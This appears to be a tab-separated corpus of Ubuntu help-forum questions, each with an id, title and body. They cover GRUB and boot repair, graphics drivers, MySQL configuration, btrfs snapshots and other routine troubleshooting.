123940	ca n't disable active window 's transparency | hover effect not working	i 'm having a problem right now with my window frames ' opacity settings . for some reason the active window very often ( but not always ) has a half-transparent title bar . this is really distracting but so far i have n't found any way of getting rid of this effect . i think the problem might be caused by settings i made using the `` ubuntu tweak '' tool . but whenever i try to reset the window frame settings in `` ubuntu tweak '' the application crashes . i already tried reinstalling it but the problem still remains . additionally the hover effects ( on the max , min , and close button ) are not working properly . do you know how to reset the window frames ' opacity settings so that active window frames have no transparency at all ? thank you for you help !
123941	is there any setup option to use binary prefixes globally	it would be better to see file sizes in binary units ( i.e . : mib ) for my job everywhere in ubuntu ( at least gnome would be perfect . ) so my question : is there any global setup option to use binary prefixes everywhere in ubuntu ( or at least nautilus ) ?
123944	ubuntu 11.10 crashed and i cant boot it	i installed ubuntu 11.10 some time ago . i was watching videos in youtube , when it suddenly became unresponsive . i waited 5-6 minutes , and restarted ( with the power button on the pc ) . it open up the bootloader and let me to chose between ubuntu or windows xp . when i selected ubuntu , it showed the purple screen , like normal and let choose recovery or normal . i 'm not able to start ubuntu , and if i select normal nothing happens . if i select recovery , it says something like `` loading ramdisc '' and it stays like that with no results ... the really big problem is that i do n't have an optical drive , so were can i put the live cd ? soon , i will buy new pc , so i do n't want to spend my money on a new optical drive . what can i do ? also , how can i recover my files ? i 'm writing this from win xp , which works .
123948	unity drag & drop files to another window	for example : i have 2 nautilus windows opened and maximized and i want to move a file from window a to window b . if i drag the file on the unity launcher it does n't move the file but it will open the window where files is -.- '' i 'm doing something wrong or there are a big bug into unity ? ? thanks ps : i 'm using ubuntu 12.04 amd64 , obviously packages are up-to-date ; )
123952	how to repartition an ec2 micro instance under ubuntu 10.10 ?	i want to create an instance to run a webserver under ec2 using ubuntu 10.10 . that 's actually quite easy , but what i 'd want to change how that virtual disk partitioning is made . using the wizard they provide you are able to charge a given virtual file system , so the /var and the /tmp folders are on the same partition as root . i 've thought about creating two block storage volumes and mount them as if they were those two partitions . i think that should work but , by now and because i just want that instance for web testing purposes , i was wondering if it 's possible to just take that microinstance and repartition it , as if there where 3 different partitions ( /root , /var and /temp ) .
123953	set resolution to 1024x600 in eee pc x101ch	i tried to add the resolution with xrandr and then setting it but it gives the no gamma recognized error . i tried with 12.04 beta and 11.10 with no results . also it seems that there 's not much info about this model .
123956	ctrl+alt+t brings up trash folder , not a terminal ?	i recently installed ubuntu 12.04 - wow it 's got fast and responsive ! it 's a joy to operate ! and until just a few moments ago i was very pleased with everything . i have installed gnome-tweak-tools compiz etc . and it has been working fine - the last couple og days . i decided to try to change my keyboard layout , s책 my cmd-button ( ubuntu installed on macboob pro ) would act more like it does in os x - i we 're able to do this with ease : d problem is , somewhere along the way my shortcut ctrl+alt+t for bringing up a terminal got mixed up - it now somehow brings up my trash folder instead ! i checked my keyboard bindings and it says : open a terminal ctrl+alt+t compiz - > says the same thing ! gnome-tweak-tool also tells me that this is the shortcut.. i 've tried reassigning it everywhere , but it seems it wo n't work ? is this a bug or am i missing something somewhere ? ; ) is there somewhere where and shortcut for opening trash folder is set ? cause i ca n't seem to find it - guess that is what i need to undo ? edit : if i hold down just ctrl+alt i get up the window listing me the shortcuts . here in the top left corner under launcher the last one ctrl+alt+t opens trash ! so this is what is causing it , but where do i change that setting ?
123960	kernel panic on booting	i was trying to repair my grub after installing windows over ubuntu . but i could n't repair it and asked this question . while discussing with psusi , we notice something . my installed system is 64bit but my some library files ' are 32 bit ( for example : libdevmapper.so.1.02.1 ) . ( you can check step 13 for my question . and check other steps for see which steps i followed . ) my old ubuntu was installed on /dev/sda3 . i mounted it to /mnt/ubusda3 root @ ubuntu : /home/ubuntu # file /mnt/ubusda3/sbin/init /mnt/ubusda3/sbin/init : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , stripped root @ ubuntu : /home/ubuntu # file /mnt/ubusda3/lib/libdevmapper.so.1.02.1 /mnt/ubusda3/lib/libdevmapper.so.1.02.1 : elf 32-bit lsb shared object , intel 80386 , version 1 ( sysv ) , dynamically linked , stripped sudo dpkg -- root=/mnt/ubusda3 -i /mnt/ubusda3/var/cache/apt/archives/libbz2-1.0_1.0.5-6ubuntu1.11.10.1_amd64.deb chroot /mnt/ubusda3 apt-get install -- reinstall libdevmapper1.02.1 and then again i tried to update-grub i got mapdevfs : error while loading shared libraries : libdebian-installer.so.4 : can not open shared object file : no such file or directoryerror . i restarted my system but nothing changed . i found mapdevfs on /bin/mapdevfswith which mapdevfs command . sudo rm /bin/mapdevfs for i in /sys /proc /run /dev ; do sudo mount -- bind `` $ i '' `` /mnt/ubusda3 $ i '' ; done grub-install /dev/sda finally i fix my grub problem . now there is a grub menu while booting . previous linux versions screen ( and dusts ) but when i choose ubuntu 3.0.0.17-generic , it 's freezing on loading screen and i 'm getting this error : ( scroll lock and num lock flashing . ) when i choose other kernel versions -which in previous ubuntu versions screen- , i 'm getting this error for both of them . note 1 ( for irrational john ) ubuntu @ ubuntu : ~ $ sudo su root @ ubuntu : /home/ubuntu # mkdir /mnt/ubusda3 root @ ubuntu : /home/ubuntu # mount /dev/sda3 /mnt/ubusda3 root @ ubuntu : /home/ubuntu # for i in /sys /proc /run /dev ; do sudo mount -- bind `` $ i '' `` /mnt/ubusda3 $ i '' ; done root @ ubuntu : /home/ubuntu # chroot /mnt/ubusda3/ root @ ubuntu : / # apt-get -v -- reinstall install libnih reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libnih and then i noticed it 's libnih1 not linbih ( http : //packages.ubuntu.com/search ? keywords=libnih & searchon=names & suite=oneiric & section=all ) root @ ubuntu : / # apt-get -v -- reinstall install libnih1 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : winbind ( 3.5.11~dfsg-1ubuntu2.2 ) the following packages will be upgraded : winbind ( 3.5.11~dfsg-1ubuntu2.1 = > 3.5.11~dfsg-1ubuntu2.2 ) 1 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . 6 not fully installed or removed . need to get 54.7 kb/5,693 kb of archives . after this operation , 32.8 kb disk space will be freed . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! libnih1 install these packages without verification [ y/n ] ? y get:1 http : //tr.archive.ubuntu.com/ubuntu/ oneiric/main libnih1 amd64 1.0.3-4ubuntu2 [ 54.7 kb ] fetched 54.7 kb in 0s ( 57.1 kb/s ) can not write log , openpty ( ) failed ( /dev/pts not mounted ? ) ( reading database ... 196784 files and directories currently installed . ) preparing to replace winbind 2:3.5.11~dfsg-1ubuntu2.1 ( using ... /winbind_2 % 3a3.5.11~dfsg-1ubuntu2.2_amd64.deb ) ... /sbin/runlevel : error while loading shared libraries : libnih.so.1 : wrong elf class : elfclass32 * stopping the winbind daemon winbind ... done . unpacking replacement winbind ... preparing to replace libnih1 1.0.3-4ubuntu2 ( using ... /libnih1_1.0.3-4ubuntu2_amd64.deb ) ... unpacking replacement libnih1 ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot can not write log , openpty ( ) failed ( /dev/pts not mounted ? ) setting up libwbclient0 ( 2:3.5.11~dfsg-1ubuntu2.2 ) ... setting up samba-common ( 2:3.5.11~dfsg-1ubuntu2.2 ) ... setting up winbind ( 2:3.5.11~dfsg-1ubuntu2.2 ) ... * starting the winbind daemon winbind /usr/sbin/winbindd : error while loading shared libraries : libcap.so.2 : wrong elf class : elfclass32 ... fail ! invoke-rc.d : initscript winbind , action `` start '' failed . dpkg : error processing winbind ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up libsmbclient ( 2:3.5.11~dfsg-1ubuntu2.2 ) ... setting up samba-common-bin ( 2:3.5.11~dfsg-1ubuntu2.2 ) ... setting up smbclient ( 2:3.5.11~dfsg-1ubuntu2.2 ) ... setting up libnih1 ( 1.0.3-4ubuntu2 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : winbind e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this time i 'm getting same boot error for libnih-dbus.so ... . file . also for finding other 32bit files , i executed your commands and i see all files in /mnt/ubusda3/lib/modules/3.0.0-12-generic/ and /mnt/ubusda3/bin are 32 bit . is it possible to reinstall whole kernel files ?
123961	installing wine produces error about my internet connection	i have downloaded wine successfully using software center . when i click install it gives me an error - some unrestricted softwares needs to be installed and there is an error with my internet connection . how many times do i need to download this wine ? i am confused , greatly confused .
123965	etc/hosts setting for standalone mysql server	i am a little confused with setting up my new mysql server . it has to be a standalone server . other webservers should connect to it . the hostname of the webserver is `` webserver '' , the ip is 192.168.1.50 , and it 's working the hostname of the mysql server is `` mysql '' , the ip is 192.168.1.60 , and it 's working i like to use a hostname instead of ip address to connect to the mysql server . in /etc/hosts ( mysql server ) i have : 127.0.0.1 localhost 192.168.1.50 webserver the webserver has no virtual hosts , there is one big directory /var/www that contains several websites in development . i have used this as a guide : http : //library.linode.com/databases/mysql/standalone-mysql-server on service mysql start : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.8 '' ( uid=1000 pid=5060 comm= '' start mysql `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) log entries 120421 16:10:31 innodb : starting shutdown ... 120421 16:10:36 innodb : shutdown completed ; log sequence number 0 44233 120421 16:10:36 [ note ] /usr/sbin/mysqld : shutdown complete 120421 16:14:04 [ note ] plugin 'federated ' is disabled . 120421 16:14:04 innodb : initializing buffer pool , size = 8.0m 120421 16:14:04 innodb : completed initialization of buffer pool 120421 16:14:04 innodb : started ; log sequence number 0 44233 120421 16:14:04 [ error ] ca n't start server : bind on tcp/ip port : can not assign requested address 120421 16:14:04 [ error ] do you already have another mysqld server running on port : 3306 ? 120421 16:14:04 [ error ] aborting
123967	all but gui is black	whenever i play a video game that has 3d graphics all i can see is the gui and none of the actual rendered world ... note : i 'm a noob and just installed ubuntu yesterday . file : ///home/lucas/desktop/screenshot.png -this is what the guild wars home screen looks like ... i have a toshiba satalite a135 with just a regular onboard intel graphics card . i played guild wars a lot when i had windows what am i doing wrong ?
123973	ca n't execute my own program	i am learning programming using the opengl and sdl library . problem is , once the program is built , i ca n't run it . ( bash : ./nameofmyprogram permission denied ) i never had this problem with previous exercises , the files are mine , how could i run them properly ? thank you for your help .
123977	how to ungroup windows on task switcher ?	i 'm playing with ubuntu 12.04 , precise pangolin , and there 's an issue i ca n't see how to solve . if i have three instances of , let 's say , firefox , in the switcher appears a single firefox icon , i have to wait something like a second for it to open so that i can finally choose the one i 'm looking for i tried with compiz-settings and the unity plugin but could n't find an option to ungroup windows .
123980	permanently erasing external hard disk data	i have a seagate hard disk which is under warranty for next 4 years . i always had a problem reading this hard disk as i had to tilt the usb cable for it to make proper contact with the pins . however , for last 2 to 3 months , it has stopped working altogether . fdisk -l does not yield any device info apart from the partitions on the internal hard disk . however , the hard disk does light up when i successfully connect it ( that is , by tilting the usb cable ) my problem is that i can not simply give my hard disk to the seagate customer support for replacement as there are some personal pictures and scanned images of almost all identity cards possible and educational certificates . is there a way to somehow erase the data on this hard disk without opening it ( as that would void the warranty ) ? magnetic degaussing comes to mind , however , as this guy has mentioned here , it requires industry grade magnets to do it . i know i should have encrypted my data and i learned it the hard way , but is there a way out so that i can erase the data and make use of the warranty as well ?
123983	takes a long time to upload to cloud on ubuntu one	i 'm trying to upload 3 files ( about 150mb each ) and so far it has taken about 12 hours over a 2 day period and it is still in progress and slows down my internet connection considerably , i 'm using about 1400kib upload speed , on a wired connection , and have used so far 118 mb out of 5gb , my os is ubuntu 11.10 . why is it so slow ?
123985	cycling through wallpapers	i 've gone a step further than most and added to the background-1.xml file that lies in contest folder . ( which is here ) . everything seems to be fine , but when i want to change a my wallpaper to the one that cycles , neither any of the images are there , nor is there a button to chose the cycling wallpaper . see here can anyone help ?
123988	what is irc.ubuntu.com used for ?	irc channels are one of the most significant parts of ubuntu community infrastructure . however , all ubuntu channels i 've ever met are hosted on irc.freenode.net . what 's the point of irc.ubuntu.com ? i 've seen some users claiming they can be found there ... but is that server used at all ?
123990	youtube video stutters	i have an nvidia geforce 7400 graphics card with 1 gb of ram . just did a clean installation of 11.10 ubuntu . everything is fine except for the youtube videos , apart from being a lil slow it stutters , esp the audio . i disactivated the `` hardware acceleration '' in the flash properties and also installed flash-aid and tried to install the versions it was recommending . but the problem persists . is it an nvidia problem ? what could i do to resolve the problem ? thanks !
123995	how do i download pictures from my phone ?	i have a htc hero 4g and want to download pictures . the software does not recognize the phone and i do n't know how to find the drivers .
123996	which files have suid bit in bin/ folder	accidentally , i made a mistake with files in /bin/ folder , and now i learned that some of it need to have suid bit . can someone please do ls -l /bin/ and paste which files does n't have -rwxr-xr-x flags ?
123997	how do i install nvidia drivers on a lenovo ideapad y570 ?	i just got myself a nice lenovo ideapad y570 , first thing i did was load kubuntu on it everything was going smoothly until i tried to set up virtual box and realized my drivers werent allowing my nvidia gt 550m to communicate with my system at it 's full potential . so i updated my drivers , followed the instructions perfectly ( or at least i 'm 90 % sure i did ) , everything installed without error , but now my resolution is stuck at 640x480 , a long ways away from the native resolution ( i forget the specific resolution ) any ideas as to what i can do to fix it ? if any further information is needed please let me know .
123999	how to assign keys in the keyboard ?	i am using ubuntu 10.04 netbook version and i want to assign my windows key on the keyboard to preform the same function as it as in windows ( minimize all app and open favorite ) . now the key is not assign to anything . thanks
124001	there is no driver for ralink chip 5360	i bought dwa-525 and it does not work google did not help . no one on the internet could not get the device to work = ( lspci 01:06.0 network controller : ralink corp. device 5360 i do not know what to do uname -a linux pc 3.0.0-19-generic # 33-ubuntu smp thu apr 19 19:05:57 utc 2012 i686 athlon i386 gnu/linux cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' i am sure that the problem is dwa-525 and chip 5360 . i found many similar problems on the internet without solving = (
124002	requiring unexisting password	when i created my user account i did n't choose a password but now when i try to install an app it says to authenticate with password , though i know not of a password that i can use . what should i do ?
124010	issue with nvidia graphic card and display resolution	translation : i have an issue with my graphic card ( nvidia quadro fx 1400 ) . when i go to system information this card is reported as `` unknown '' even though i installed nvidia-current drivers . now i ca n't adjust the screen resolution . it is now at 640x480 even though my display is capable of 1280x1024 . it is a hp 1955 lcd . the display is also not recognized . bonjour , j'ai un problème avec ma carte-graphique ( nvidia quadro fx 1400 ) lors j'allai o information système ! et carte graphique ! je trouve qu'il est 'inconnu' et j'ai installer le current version nvidia ! et je peux pas ajuster la résolution d'écran ! il est a 640x480 et la résolution que mon écran conseille s'est 1280x1024 ! mon écran c'est hp 1955 lcd ! et aussi mon écran est inconnu ! merci de votre aide = )
124013	logitech k750 not working	i brought new logitech k750 keyboard . when i insert wireless unifying receiver to my laptop , i was expecting that some software utility will pop up for installation but all in vain . i rebooted the system , nothing happened , i type key on keyboard but it does n't take any input and system shows no response . i am using ubuntu 11.10 . any suggestions on how to make it work ?
124015	window controls moved to right hand side	without realising , the windows controls ( max , min , close ) have been moved to the right hand side without me realising . i was just wondering , how would i go about changing it back to the left and does anyone know why this might have happened ? this is in 12.04 precise . thanks
124016	how do i boot ubuntu cloud images in kvm ?	i 'm trying to get an ubuntu cloud image running on my local kvm installation . i am downloading the qcow2 image from here : http : //cloud-images.ubuntu.com/releases/precise/beta-2/ and using the instructions from here : https : //help.ubuntu.com/community/uec/images # downloaduecimages i can not find a way to get the password for the instance . the instructions say that grub creates the password on first boot and that it is written to the console . what i have n't found is a way to read what is sent to the console . it scrolls too fast to view in the vnc console . it seems like there should be a way to send console output to a file , but if there is such a method i can not find it .
124017	how do i restore the default repositories ?	there are now errors when updating and i can not install most software due to a corrupted /etc/apt/sources.list file . is there a copy i can download to replace it ? the file would be for ubuntu 12.04 ( final beta ) in the united states .
124021	how do i restore the original grub2 boot loader ?	i wanted to try out the burg boot loader , so i typed in the following commands : sudo add-apt-repository ppa : ingalex/super-boot-manager sudo apt-get update sudo apt-get install burg that was just slowing down my boot , and i did n't have any control about the ubuntu recovery manager , besides , it was booting up ubuntu safe mode . i re-installed grub2 by entering : sudo mount /dev/sda5 /mnt sudo grub-install -- root-directory=/mnt /dev/sda that did n't work too well ... it ended up making my machine put up a grub command line . i 'm trying to restore the grub os choice menu , but do n't know the commands to do that .
124022	merging home directories	here 's the thing . i did a fresh install of 11.10 . i created a separate partition for /home and another for / . i then installed 11.04 on the / partition . now i still have the /home on the separate partition and the home dir that came with 11.04 . how do i merge the two or replace the 11.04 home directory ?
124023	how do i open a folder as root ?	more specifically the /etc/apt/ folder . i need to delete some files and replace /etc/apt/sources.list with a newer version .
124025	ubuntu 11.10 wo n't let me login ; it kicks me back to login screen	i was just copying files from my external hdd to my .wine directory , when i noticed the place where the launchers are ( unity desktop ) was getting fuzzy and holding onto graphics from the things in the location prior ( i have it autohide when a window covers it ) . i assumed it was just ram problem , so i canceled the copying , since it was n't actually important . the glitch remained , and so did another ; very slow response time . the mouse moved just fine , but windows were waiting about a minute after i hit the x button to close or even switch active window . once again , i blamed ram ( only have 2 gbs ) so i restarted . usually , it autologs me into my account , since i 'm the only user , but this time it presented me with the login screen . i thought it odd , but tried to log in . a black screen with some text pops up ( assuming terminal screen ) for half a second then kicks me back to the login screen . i tried the guest account and no luck . i went into terminal ( alt+ctrl+f1 ) and logged in and it worked . i deleted .xauthority , made new account , and even rebooted quite a few times , all to no avail . anyone have an idea ?
124032	installing ubuntu on an older laptop gives me an error message	the truth is that i can not even start the installation . the live cd is loading and all of a sudden it is ejected and this message pops up : unmount : /run/lock/ : not mounted it 's an averatec laptop and has a 1.50 ghz intel pentium m processor and 504 mb ram . the disk should be just fine , since i 've already done the installation with it ( it 's lubuntu 11.10 desktop i386 ) . the checksum all worked out well on the iso and on the disc too . now , what i did ... i ticked all the first 3 options ( acpi=off , noapic , noalpic ) using f6 before on the installation screen to facilitate the installation . now i 've got the os on the laptop , but after the installation i had to follow desgua 's instructions and make the `` acpi=off , noapic , noalpic '' changes permanent .
124035	mac air trackpad suddenly does n't respond	when the trackpad stops responding , this leaves me unable to do anything , including shutting down . is there a fix ?
124037	does creating and working with a encrpyed folder using `` ecryptfs-utils '' pose any extra pressure on the cpu ?	i was thinking about creating a folder which i only can access . i want to know if i create the private folder , does it going to degrade the cpu performance as it may result in heavy encrypting and decrypting ? ! im on ubuntu 11.10 32 bit os intel core2duo 4 gb ram .
124038	~/.xauthority required but missing	i 've now run into two instances where i 've received errors because the ~/.xauthority file is required but is missing from my user folder . i have read that the .xauthority file has been deprecated , and the function has moved to : /var/run/gdm/auth-for- < user > - < random_characters > /database` i have attempted the solution provided in how do i create the .xauthority file ? . which suggests i make a symbolic link from $ xauthority to ~/.xauthority upon startup . but this method has has not worked for me . i 've also tried running that command and variations of it in the terminal , but without success . i am running , in vmware workstation 8 , a minimal install of ubuntu server 11.10 64bit with xfce4 on top . the error , `` unable to copy the user 's xauthorization file '' , i 've received twice now . first when attempting to open a root terminal from the thunar context menu , using the 'custom action ' feature , with the commandgksu `` xfce4-terminal -default-working-directory= % f '' . then again , when attempting to install truecrypt , which gives me the error a few steps into the installation process . is there another way to go about this ? and , more fundamentally , why do applications still rely on this file if it has been deprecated ? since they do , why is n't a link provided by default until the software catches up ? i understand things are not always so tidy , and also that i may be missing something important and basic , so please forgive my impudence .
124040	login sound busted ubuntu 11.10	i was trying to change my login sound..didnt work . i tried changing back to original still no cigar . went to start up application to change the command for gnome login sound to a direct link to the login sound file ... still did'nt work . current command for gnome login sound is /usr/share/sounds/ubuntu/stereo . any idea how i can get my login sound to start working again ? ps to change the sound i followed this procedure ... http : //peeqsource.com/2012/changing-login-sound/
124042	plugging in usb mouse or usb headset crashes xserver in fresh install of 12.04	i 'll try to be as clear as possible . i recently wiped my system to install ubuntu studio 12.04 , but it would n't boot the installer with my usb mouse plugged in . when i did get everything installed and booted into the system i plugged in my usb mouse and gnome immediately quit to a black screen , the last line of the message on the screen was setting irq priorities : start [ i8042 ] irq 12 pid=59 prio=74 : ok *stopping system v runlevel compatibilit [ ok ] i was able to switch to tty1 , but unable to run startx from there , but lsusb does recognize the devices . i rebooted the system and this happens every time i plug in the mouse or a usb headset . i am able to plug in a usb midi uno device , a usb m-audio fast track ultra , or a usb external hard drive , but the problem gets stranger . if i plug in the usb hard drive first , then plug in the mouse it works . but no matter what order i plug things in , the usb headset will crash the system . i found the following in /var/log/syslog after plugging in the usb headset . http : //pastebin.com/cntrybg1 i have searched around online and i am unable to find any similar problems .
124046	kubuntu screensaver wo n't autostart	am using ubuntu lucid + kubuntu-desktop . nvidia works fine . screensavers set to autostart & worked fine after initial install . now screensaver attempted to start ( brief flash of black only ) but since quit doing that.. all screensavers work fine in test mode . is there a file entry that controls this ? . kde/autostart is empty - should there be an entry here ? would the log files show up any relative errors ? i am a newbie & the log info is way out of my league ! have not found any relative posts here or other forums . i would appreciate suggestions .
124049	does mysql comes with the default installation ?	i have checked that i have mysql installed . does it comes with the default installation ? i dont remember i have installed it . installed files : mysql server core 5.1 , mysql client core , mysql common , virtuoso minimal and open source . i 'm on ubuntu 11.10
124055	grub boot into windows 7 breaks grub and makes system unbootable	i have installed ubuntu 12.04 ( daily-live iso from 21.04.12 ) alongside windows 7 on an hp elitebook laptop . the installation went fine , except that it installed grub onto my usb disk ( /dev/sdb ) instead of the hard disk ( /dev/sda ) . i was able to boot into the ubuntu installation by using the usb disk which had grub installed on it . i then installed grub manually onto the hard disk ( /dev/sda ) by running `` grub-install /dev/sda '' . after i do that , i can book into either ubuntu or windows 7 from the grub menu . however , after booting into windows 7 , grub does n't load on the next boot . the computer simply reboots again and again , without giving any error . the screen simply goes black and reboots . there are two entries for windows 7 in grub : for /dev/sda1 and /dev/sda3 . these are in reality a single windows installation which uses both partitions . booting into either of them produces the same effect . if i boot into the ubuntu partition using the usb disk , i have found that i can restore grub to working order by using the boot-repair application . then if i boot into windows again , grub breaks again . full details of the log file which boot-repair produces , showing the partition details , are here : http : //paste.ubuntu.com/940155/ any ideas ?
124058	virt-manager loses connection sometimes	i 've been having an odd issue with virt-manager on 12.04 . generally speaking it works flawlessly , however sometimes it appears to lose connection . i 've noticed that this will only occur if i 'reopen ' it after closing it in the same session . ie : use it for a few hours , then close it out . a few hours later i open it up again and i 'm missing a connection to qemu entirely . pictures are here : working : http : //imgur.com/azbxa not working : http : //imgur.com/hyqzb i 've seen a few bug reports around that say this type of behaviour was fixed in 9.1 , which i 'm currently on . is anyone else seeing this ? thanks ,
124060	docking g2 to ubuntu for syncing and running apps	hey guys i would like to dock my phone with ubuntu and run everything from thie . however i do n't have the docking station and would like to know if i can use the usb since i do n't have the docking stationto sync and run the apps and stuff like that from my phone to pc since i 've herd they share same kernel
124065	display not shown in gnome color !	i want to change the color profile for my display in gnome color but my display is n't in the list . how do i add my monitor , an asus ml238 , to gnome color ? when i look at display settings it says unknown for my monitor , but the nvidia settings successfully identify the make and model . any help would be greatly appreciated . i 'm using ubuntu 11.10 . thanks !
124066	how can i find the password to www-data group to so i can change directory access rights ?	i am running ubuntu on a oracle vbox in windows 7 to develop a website . i have a set of directories that have owner read/write permissions but the group www-data does not have rights on the directories . i tried the command sudo chmod 640 /path-to-directory to change the status , but receive a message requesting my www-data password . my owner level password does not work and i do not know what this password might be . i tried passwd and receive the message 'changing the password for www-data and a prompt for my current password . when i enter it , i get this error message : passwd : authentication token manipulation error passwd : password unchanged this error message looks more like some sort of problem on my system , but everything else works fine .
124074	dual boot default question ( w7 & ubuntu )	i just installed ubuntu 11. on my computer but the default is ubuntu . how do i change it so that windows 7 is the default ?
124075	how to make a btrfs snapshot ?	my /home partition consists of an entire physical disk . it is formatted as btrfs . i want to snapshot it . i 'm confused regarding subvolume naming , in particular . i am aware that there are similar questions , but each similar question seems to be asking something different from what i 'm asking ( and they are older , which means probably outdated , given the rapid development of btrfs ) . for example , the answer to this question is apparently not the answer to my question because my /home partition is a separate volume and the man page for btrfs shows a different command for creating snapshots now . another similar problem , no solid solution . someone else as confused as me on the naming issues my question : starting simple : is this the correct command to take a simple snapshot of my home partition ? btrfs subvolume snapshot /home/ @ home /home/ @ home_snapshot_20120421 i got really brave and tested it and it does not work . the error is error accessing /home/ @ home . as shown below , @ home is listed . i 'm obviously confused on subvolume names . do i need to use them in creating snapshots ? some examples show taking snapshots of home using /home as the source parameter , but based on examples of root volumes , it seems to me that i need to use /home/ @ home . would this command work ? and if not , why ? btrfs subvolume snapshot /home /home/ @ home_snapshot_20120421 is the @ just a naming convention ? is it meaningful at all ? here 's some output that may be relevant : btrfs subvolume list /home id 256 top level 5 path @ home i 'm not sure what that means , exactly . when i try btrfs device scan it gives an error ( e.g . unable to scan the device /dev/sda1 ) . my file system does n't have any errors . everything is fine . here are my partitions . in response to one reply , no /home is not my only btrfs partition . /dev/sda1 : ( boot partition ) type= '' ext2 '' /dev/sda2 : ( root partition ) type= '' btrfs '' /dev/sdb1 : ( home partition ) type= '' btrfs '' /dev/sdc1 : ( shared partition ) type= '' btrfs '' /dev/sdc2 : type= '' swap ''
124076	where do i get a sis mirage 672 vga driver ?	i need to obtain a display adapter for sis mirage +3 gpu ( closed source ) , so i can run a stable system on ubuntu . i need to find a driver for this adapter that is open source and gives completely stable video playback .
124078	how can i compile imgcnv ?	i 'd like to compile imgcnv so that i can chop up images for panojs . imgcnv 's install directions are extremely curt : $ pwd /home/ $ user/src/imgcnv $ ls build-imgcnv-cygwin.sh install matlab msvc2010_bimread src_bimread build-imgcnv-linux.sh libs msvc2008 msvc2010_gobjects src_gobjects build-imgcnv-macosx.sh libsrc msvc2008_bimread readme.txt testing changelog.txt licence.txt msvc2008_gobjects scripts generated makefile msvc2010 src $ cat install welcome to imgcnv . a utlity for reading and converting biological image formats . 1 . to install just execute , $ make install 2 . sit back here 's what happens when i try to make
124083	what is the web address where my files are stored on ubuntu one ?	i would like to link a logo to paypal for gift certificates and it 's asking for the url . what is the url for ubuntu one 's folders ?
124087	ring switcher is not automatically selecting the windows on key release	i configured the ring switcher with the ccsm . i press super + tab and i start to cycle between all windows , but when i release the keys on the desired one , i have to either click on it or press enter . how can i make it automatically select the window when i release the key ? it was working , but suddenly it stopped doing it . i have the same trouble with shift-switcher compiz plugin .
124090	sound does not work on laptop on an hp g62	i just recently had to reformat my laptop ( hp g62 ) and i did so with the ubuntu 10.04 live cd , for it was the only one i had . i realized , after trying to listen to music , that my laptop speakers were n't working , and they had been just before reformatting . headphones worked , and i tried so many different solutions found on the internet but to no avail , in fact , i soon lost sound to even my headphones . so i decided perhaps i should just upgrade , and i did to 12.04 , but still there 's no sound coming from the speakers or headphones . when i go to sound settings it all seems normal . any advice on how to fix this ?
124094	how to hide a ( n ) ( ntfs ) partition from ubuntu	i need to hide an ntfs partition from listing in the nautilus . how can i achieve that ? is there any tool to do that ? and how can i hide files in ubuntu ( except . operator )
124096	if i want to create a vm for win 7 on top of ubuntu , where do i get the install disks ?	i 've got a hp pavilion laptop that came with win 7 already loaded . i shrunk the main partition and installed ubuntu . there 's a partition called hp_tools . i did not see a partition for win 7 installation disks . if i want to create a vm for win 7 on top of ubuntu , where do i get the install disks ?
124102	how do i enable extended attributes on ext4 ?	i want to play around with ceph and it needs extended attributes enabled . how do i mount my filesystem with this support ?
124104	move mysql data dir to truecrypt volume	i have ubuntu desktop 11.04 and i 'm trying to move /var/lib/mysql to a truecrypt volume and am failing at every attempt . this is for development purposes , and there 's a particular database i need to work with that needs to be highly secure for numerous reasons . upon a fresh install of mysql-server and mysql-client , i 'm able to start mysql without any problem . so i then move /var/lib/mysql to the truecrypt volume ( call it /foo/truecrypt ) , and then edit /etc/mysql/my.cnf to point datadir to /foo/truecrypt . after i check permissions to make sure that they are the same , i try to start mysql again . it does n't work ( mysql just continues to hang ) , and i 'm unable to get mysql to work again ( even after killing all mysql processes and moving the datadir back to /var/lib/mysql ) . i 've done a apt-get -- purge remove mysql-client mysql-server mysql-common ( and then deleted all files in /var/lib/mysql , etc/mysql/ and /var/log/mysql* ) at least 5 times tonight in order to get a fresh install to try again . while mysql hangs , i 've gone into /var/log/mysql/ and here 's what shows up in mysql.err : 120421 22:50:03 [ note ] plugin 'federated ' is disabled . ^g/usr/sbin/mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 120421 22:50:03 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 120421 22:50:03 innodb : initializing buffer pool , size = 8.0m 120421 22:50:03 innodb : completed initialization of buffer pool 120421 22:50:03 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'open ' . innodb : can not continue operation . i 've tried moving /var/lib/mysql/ and then creating a symlink instead of editing my.cnf . that does n't make a difference . the errors above indicate a missing file or permissions issues . however , plugin.frm exists in /foo/truectrypt/mysql/mysql ( as i simply just moved the parent directory ) , and ownership and permissions on that and all other files in that directory are the same as they were . do you have any suggestions ? i 'm stumped .
124106	is there a way to get miro to use flash ?	i recently downloaded miro which i used to use with great satisfaction in windows , however on ubuntu , miro can not play flash videos or sites because of flash compatibility issues . yet i have flash installed and working great in other applications . is there a way to get it working with miro ? thanks
